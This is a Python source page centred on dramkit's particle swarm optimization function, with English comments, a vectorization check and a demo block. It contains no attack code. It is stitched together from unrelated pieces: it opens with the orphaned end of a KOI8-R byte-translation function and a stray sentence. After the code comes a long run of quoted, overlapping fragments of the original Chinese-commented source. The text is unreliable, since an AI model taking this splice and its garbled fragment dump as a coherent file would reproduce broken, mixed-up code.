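    """Replace known decimal entities with KOI8-R bytes, fix charset tag."""
    data = ENTITY_PATTERN.sub(
        lambda m: UNICODE_TO_KOI8R.get(m.group(0), m.group(0)), data)
    return CHARSET_PATTERN.sub(b'KOI8-R', data)

sample = b'charset=ISO-8859-1 &#1040;&#1072;'
print(translate_buffer(sample))  # b'charset=KOI8-R \xe1\xc1'

Working on bytes rather than str mirrors the original's binary write ('wb') and avoids re-encoding content that is already KOI8-R.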
# -*- coding: utf-8 -*-
# source repository: Genlovy-Hoo/dramkit

import time
import numpy as np
from dramkit.gentools import isnull
from dramkit.optimizer.utils_heuristic import rand_init


def pso(objf, func_opter_parms):
    '''
    Particle Swarm Optimization (PSO) algorithm

    TODO
    ----
    Only continuous real-valued variables are handled for now; support
    for discrete variables could be added later.

    Parameters
    ----------
    objf : function
        Objective function. Note: it must be posed as a minimization
        problem beforehand.
    func_opter_parms : FuncOpterInfo
        :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` instance;
        parms_func, parms_opter and parms_log must be set.

        | parms_func is the objective-function info dict; keys must include:
        |     x_lb: lower bound per dimension, list or scalar; if a list,
        |         its length should equal dim
        |     x_ub: upper bound per dimension, list or scalar; if a list,
        |         its length should equal dim
        |     dim: number of variable dimensions
        |     kwargs: extra arguments passed to the objective function
        | parms_opter is the optimizer info dict; keys must include:
        |     popsize: population size (number of samples per iteration)
        |     max_iter: maximum number of iterations
        |     v_maxs: upper bound on the absolute per-step change in each
        |         dimension, list or scalar; if a list, its length should
        |         equal dim
        |     w_max: maximum inertia weight w; w balances global and local
        |         search, and a larger w strengthens global search
        |     w_min: minimum inertia weight
        |     w_fix: if set to a value in (0, 1), the inertia weight is
        |         fixed at w_fix instead of updated dynamically; by default
        |         w is updated dynamically with a linearly decreasing schedule
        |     c1, c2: learning factors
        | parms_log is the logging info dict; keys must include:
        |     logger: the logger
        |     nshow: if an integer, log the current best objective value
        |         every nshow iterations

    Returns
    -------
    func_opter_parms : FuncOpterInfo
        func_opter_parms updated with the optimization results

    References
    ----------
    - https://www.jianshu.com/p/8c0260c21af4
    - https://github.com/7ossam81/EvoloPy
    '''

    # extract parameters
    opter_name = func_opter_parms.parms_opter['opter_name']
    if opter_name == '' or isnull(opter_name):
        opter_name = 'pso'
    func_opter_parms.parms_opter['opter_name'] = opter_name
    # objective function parameters
    x_lb = func_opter_parms.parms_func['x_lb']
    x_ub = func_opter_parms.parms_func['x_ub']
    dim = func_opter_parms.parms_func['dim']
    kwargs = func_opter_parms.parms_func['kwargs']
    # optimizer parameters
    popsize = func_opter_parms.parms_opter['popsize']
    max_iter = func_opter_parms.parms_opter['max_iter']
    v_maxs = func_opter_parms.parms_opter['v_maxs']
    w_max = func_opter_parms.parms_opter['w_max']
    w_min = func_opter_parms.parms_opter['w_min']
    w_fix = func_opter_parms.parms_opter['w_fix']
    c1 = func_opter_parms.parms_opter['c1']
    c2 = func_opter_parms.parms_opter['c2']
    # logging parameters
    logger = func_opter_parms.parms_log['logger']
    nshow = func_opter_parms.parms_log['nshow']

    # timing
    strt_tm = time.time()
    func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S'))

    # normalize bounds to lists
    if not isinstance(x_lb, list):
        x_lb = [x_lb] * dim
    if not isinstance(x_ub, list):
        x_ub = [x_ub] * dim
    if not isinstance(v_maxs, list):
        if isnull(v_maxs):
            v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)]
        else:
            v_maxs = [v_maxs] * dim
    v_mins = [-x for x in v_maxs]

    # initialization
    vel = np.zeros((popsize, dim))  # initial velocities
    pBestVals = np.zeros(popsize)  # best value found by each individual so far
    pBestVals.fill(float('inf'))  # +inf to start, since this is minimization
    pBest = np.zeros((popsize, dim))  # best position found by each individual
    gBest = np.zeros(dim)  # global best position
    gBestVal = float('inf')  # global best value

    pos = rand_init(popsize, dim, x_lb, x_ub)  # random initialization of individuals

    # record convergence history
    convergence_curve = np.zeros(max_iter)  # global best value per iteration
    convergence_curve_mean = np.zeros(max_iter)  # mean value per iteration

    # iterative optimization
    for l in range(0, max_iter):
        # clip positions to bounds
        pos = np.clip(pos, x_lb, x_ub)

        fvals_mean = 0
        for i in range(0, popsize):
            fval = objf(pos[i, :], **kwargs)  # objective value
            fvals_mean = (fvals_mean*i + fval) / (i+1)

            # update each individual's best (local best)
            if pBestVals[i] > fval:
                pBestVals[i] = fval
                pBest[i, :] = pos[i, :].copy()

            # update the global best
            if gBestVal > fval:
                gBestVal = fval
                gBest = pos[i, :].copy()

        # update w (inertia weight; larger values strengthen global search)
        if not w_fix:
            # w decreases linearly; other update schemes are possible
            w = w_max - l * ((w_max - w_min) / max_iter)
        else:
            if not 0 < w_fix < 1:
                raise ValueError('Fixed inertia weight w should be in (0, 1)!')
            w = w_fix

        # # per-element velocity and position update (kept for reference)
        # for i in range(0, popsize):
        #     for j in range(0, dim):
        #         r1 = random.random()
        #         r2 = random.random()
        #         # velocity update
        #         vel[i, j] = w * vel[i, j] + \
        #                     c1 * r1 * (pBest[i, j] - pos[i, j]) + \
        #                     c2 * r2 * (gBest[j] - pos[i, j])
        #         # clip velocity
        #         if vel[i, j] > v_maxs[j]:
        #             vel[i, j] = v_maxs[j]
        #         if vel[i, j] < v_mins[j]:
        #             vel[i, j] = v_mins[j]
        #         # position update
        #         pos[i, j] = pos[i, j] + vel[i, j]

        # vectorized velocity and position update
        r1 = np.random.random(size=(popsize, dim))
        r2 = np.random.random(size=(popsize, dim))
        vel = w * vel + c1 * r1 * (pBest - pos) + c2 * r2 * (gBest - pos)
        vel = np.clip(vel, v_mins, v_maxs)  # clip velocities
        pos = pos + vel  # position update

        # record the best objective value in every iteration
        convergence_curve[l] = gBestVal
        convergence_curve_mean[l] = fvals_mean

        if nshow:
            if (l+1) % nshow == 0:
                opter_name = func_opter_parms.parms_opter['opter_name']
                func_name = func_opter_parms.parms_func['func_name']
                logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \
                            'best fval: {}'.format(gBestVal))

    # update func_opter_parms
    end_tm = time.time()
    func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S'))
    func_opter_parms.set_exe_time(end_tm-strt_tm)
    func_opter_parms.set_convergence_curve(convergence_curve)
    func_opter_parms.set_convergence_curve_mean(convergence_curve_mean)
    func_opter_parms.set_best_val(gBestVal)
    func_opter_parms.set_best_x(gBest)

    return func_opter_parms
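The vectorized update in pso() replaces the older per-element loop that the author kept above as a comment. As a quick standalone check (illustrative only, not part of dramkit), the two forms agree whenever the same random draws r1 and r2 are reused:

# Standalone sanity check: vectorized PSO velocity update == per-element loop.
import numpy as np

def check_vectorized_update(popsize=4, dim=3, w=0.7, c1=2.0, c2=2.0, seed=0):
    rng = np.random.default_rng(seed)
    vel = rng.normal(size=(popsize, dim))
    pos = rng.normal(size=(popsize, dim))
    pBest = rng.normal(size=(popsize, dim))
    gBest = rng.normal(size=dim)
    r1 = rng.random((popsize, dim))
    r2 = rng.random((popsize, dim))
    # vectorized form, as used in pso(); gBest broadcasts across the population
    vec = w * vel + c1 * r1 * (pBest - pos) + c2 * r2 * (gBest - pos)
    # per-element form, as in the commented-out loop
    loop = np.empty_like(vel)
    for i in range(popsize):
        for j in range(dim):
            loop[i, j] = (w * vel[i, j]
                          + c1 * r1[i, j] * (pBest[i, j] - pos[i, j])
                          + c2 * r2[i, j] * (gBest[j] - pos[i, j]))
    assert np.allclose(vec, loop)

check_vectorized_update()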
if __name__ == '__main__':
    import pandas as pd
    from dramkit.optimizer.base_funcs import TestFuncs
    from dramkit.optimizer.utils_heuristic import FuncOpterInfo
    from dramkit import plot_series, simple_logger
    from dramkit.logtools.logger_general import get_logger
    from dramkit.logtools.utils_logger import close_log_file

    strt_tm = time.time()

    # objective function and its parameters
    objf = TestFuncs.ackley
    parms_func = {'func_name': objf.__name__,
                  'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}}
    # optimizer parameters
    parms_opter = {'opter_name': 'pso-test',
                   'popsize': 30, 'max_iter': 500,
                   'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False,
                   'c1': 2, 'c2': 2}
    # logging parameters
    # logger = simple_logger()
    logger = get_logger('./test/log/pso_test.txt', screen_show=True)
    # parms_log = {'logger': logger, 'nshow': 10}
    parms_log = {'logger': logger, 'nshow': 100}

    func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log)
    func_opter_parms = pso(objf, func_opter_parms)

    vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve,
                         'fval_mean': func_opter_parms.convergence_curve_mean})
    plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6))

    best_x = func_opter_parms.best_x
    func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x))

    close_log_file(logger)

    # the source is truncated after "print('used time:"; completed here
    # using the strt_tm recorded at the top of this block
    print('used time: {}s.'.format(round(time.time() - strt_tm, 6)))
dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file", "nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 -", "func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1']", "= func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow']", "速度和位置更新 # for i in range(0, popsize): # for j in range (0,", "if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix", "Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log |", "| max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 |", "= np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理", "figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used time: {}s.'.format(round(time.time()-strt_tm, 6)))", "vel + c1 * r1 * (pBest - pos) + c2 * r2", "最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal", "r2 * (gBest - pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos", "c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns -------", "parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo", "= func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min =", "w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) / max_iter) else:", "= pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x", "| logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References", "np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb,", "若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger:", "popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval)", "func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger", "r1 * (pBest[i, j] - pos[i,j]) + \\ # c2 * r2 *", "range(0, popsize): # for j in range (0, dim): # r1 = random.random()", "# 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return", "(i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] 
> fval: pBestVals[i] = fval pBest[i, :] =", "# vel[i, j] = w * vel[i, j] + \\ # c1 *", "- pos[i,j]) + \\ # c2 * r2 * (gBest[j] - pos[i, j])", "= (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i]", "func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取", "v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) #", "func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas", "= pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean':", "| w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含:", "pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) #", "''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name", "'w_fix': False, 'c1': 2, 'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt',", "get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger,", "func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r',", "# for i in range(0, popsize): # for j in range (0, dim):", "in range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x for x", "convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow ==0:", "func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x:", "= pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest", "= v_mins[j] # # 位置更新 # pos[i, j] = pos[i, j] + vel[i,", "= simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10}", "vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) #", "parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms =", "or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb']", "np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1 * r1", "fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval:", "* (gBest[j] - pos[i, j]) # # 速度过界处理 # if vel[i, j] >", "func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表", "= w_max - l * ((w_max - w_min) / max_iter) else: if not", "func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = 
func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] #", "# -*- coding: utf-8 -*- import time import numpy as np from dramkit.gentools", "5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger", "func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) +", "'-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used", "= np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解", "* (pBest[i, j] - pos[i,j]) + \\ # c2 * r2 * (gBest[j]", "# 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim if not", "= func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数", "l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean =", "import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general", "x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter:", "dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest =", "np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos", "for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals", "max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i", "in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize)", "strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb =", "+ \\ # c2 * r2 * (gBest[j] - pos[i, j]) # #", "not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix #", "= {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2,", "{'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix':", "'-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used time: {}s.'.format(round(time.time()-strt_tm,", "j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j]", "'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals =", "func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas as", "# parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100}", "w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: |", "= [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs = [v_maxs] *", "= np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1 *", "import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger", 
"优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max']", "pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ----------", "# 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest = pos[i, :].copy()", "速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel =", "pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l]", "x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub] *", "np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in range(0, popsize): fval =", "{}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest)", "i in range(0, popsize): # for j in range (0, dim): # r1", "References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if", "x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize =", "dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter =", "# for j in range (0, dim): # r1 = random.random() # r2", "w * vel + c1 * r1 * (pBest - pos) + c2", "j] = w * vel[i, j] + \\ # c1 * r1 *", "''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf :", "= np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf')", "c1 * r1 * (pBest[i, j] - pos[i,j]) + \\ # c2 *", "100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best':", "= func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) #", "list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs", "= func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs']", "FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name =", "isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)]", "= [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub] * dim", "if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for", "list): x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub]", "/ 10 for _ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins", "0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # #", "as pd from dramkit.optimizer.base_funcs import TestFuncs from 
dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import", "= func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix =", "dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值", "{'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger)", "< 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 # for", "# 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解", "# 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j]", "# w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) / max_iter)", "目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim", "| v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新", "平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos,", "float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程", "* vel + c1 * r1 * (pBest - pos) + c2 *", "from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle", "if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs", "= func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm", "coding: utf-8 -*- import time import numpy as np from dramkit.gentools import isnull", "end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if", "速度更新 # vel[i, j] = w * vel[i, j] + \\ # c1", "np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') #", "kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs:", "logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow':", "- pos[i, j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]: #", "pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest =", "+ fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval", "func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs", "time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ ==", "in range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i", "vals = pd.DataFrame({'fval_best': 
